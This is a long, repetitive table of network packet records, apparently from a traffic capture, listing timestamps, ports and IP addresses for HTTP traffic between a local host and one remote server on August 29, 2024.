                                Aug 29, 2024 22:47:00.585421085 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.585432053 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.585443020 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.585463047 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.585474014 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.585484028 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.585491896 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.585499048 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.585499048 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.585499048 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.585499048 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.585499048 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.585499048 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.585499048 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.585499048 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.585525990 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.586076021 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586085081 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586105108 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586119890 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586123943 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.586128950 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586136103 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.586139917 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586149931 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586159945 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586163044 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.586177111 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586189032 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586189032 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.586199045 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586208105 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.586226940 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.586294889 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586337090 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.586344957 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586384058 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.586405993 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586415052 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586425066 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.586436033 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.586460114 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.586468935 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.587094069 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.587136030 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.587138891 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.587147951 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.587174892 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.587176085 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.587184906 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.587187052 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.587193966 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.587207079 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.587219000 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.587224960 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.587230921 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.587255955 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.587279081 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.588399887 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.588408947 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.588421106 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.588432074 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.588443041 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.588454008 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.588466883 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.588476896 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.588490009 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.588490009 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.588490009 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.588504076 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.588522911 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589189053 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589229107 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589237928 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589251041 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589261055 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589287043 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589287043 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589298010 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589307070 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589327097 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589338064 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589359045 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589363098 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589364052 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589370012 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589404106 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589426994 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589436054 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589447021 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589469910 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589478016 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589489937 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589507103 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589518070 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589528084 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589534044 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589543104 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589551926 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589553118 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589580059 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589596987 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589632034 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589643002 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589653015 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589664936 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589669943 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589675903 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.589694977 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.589715004 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.590140104 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590188026 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590198994 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590209007 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590217113 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.590229988 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.590238094 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590250015 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590256929 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.590260029 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590270996 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590284109 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.590302944 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.590341091 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.590363979 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590374947 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590384960 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590395927 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590404034 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.590406895 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590419054 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590429068 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590430975 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.590440035 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.590449095 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.590475082 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.591202021 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591213942 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591223955 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591244936 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.591252089 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591255903 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.591274023 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591285944 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591286898 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.591295958 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591306925 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591310978 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.591317892 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591329098 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.591352940 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.591357946 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591387987 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.591440916 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591451883 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591461897 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591473103 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591480017 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.591490984 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.591495037 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591506004 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.591520071 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.591542959 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592097044 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592107058 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592118979 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592133045 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592143059 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592145920 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592164040 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592178106 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592184067 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592195034 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592204094 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592222929 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592236996 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592237949 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592248917 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592267990 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592276096 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592287064 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592293024 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592304945 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592310905 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592317104 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592320919 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592330933 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592339993 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592340946 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.592358112 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.592376947 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.671890974 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.671924114 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.671936035 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.671957970 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.671976089 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672008991 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672019958 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672029972 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672048092 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672054052 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672060013 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672070026 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672077894 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672092915 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672096014 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672103882 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672117949 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672121048 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672128916 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672141075 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672149897 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672177076 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672213078 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672223091 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672228098 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672240973 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672261000 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672262907 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672283888 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672285080 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672295094 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672307968 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672312021 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672339916 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672353029 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672841072 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672852039 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672863007 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672888994 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672909021 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672911882 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672921896 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672934055 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672945023 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672956944 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.672962904 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.672987938 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.673079967 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.673090935 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.673100948 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.673141003 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.673151970 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.673165083 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.673176050 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.673187017 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.673208952 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.673216105 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.673227072 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.673240900 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.673264980 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.674026012 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.674036980 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.674046993 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.674066067 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.674071074 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.674083948 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.674094915 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.674094915 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.674108028 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.674117088 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.674118996 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.674145937 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.674159050 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.675949097 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.675976038 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.675992012 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676007986 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676018000 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676018000 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676027060 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676029921 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676040888 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676050901 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676060915 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676079035 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676098108 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676156044 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676166058 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676176071 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676199913 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676234961 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676244974 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676248074 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676255941 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676270962 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676281929 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676282883 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676292896 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676294088 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676305056 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676321983 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676328897 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676333904 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676345110 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676353931 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676377058 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676429987 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676446915 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676457882 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676469088 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676476955 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676485062 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676532984 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676532984 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676532984 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676536083 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676547050 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676558018 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676569939 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676580906 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676585913 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.676594019 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.676625967 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.677009106 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677020073 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677030087 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677056074 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.677068949 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.677079916 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677089930 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677103996 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677114964 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677124023 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677124977 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.677146912 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.677162886 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.677278042 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677289963 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677299023 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677323103 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.677345991 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.677366972 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677376986 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677386999 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677398920 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.677402973 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.677438974 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.678008080 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.678033113 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.678042889 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.678056002 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.678066969 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.678092003 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:00.678103924 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.678113937 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.678123951 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:00.678134918 CEST8049730104.21.2.6192.168.2.4
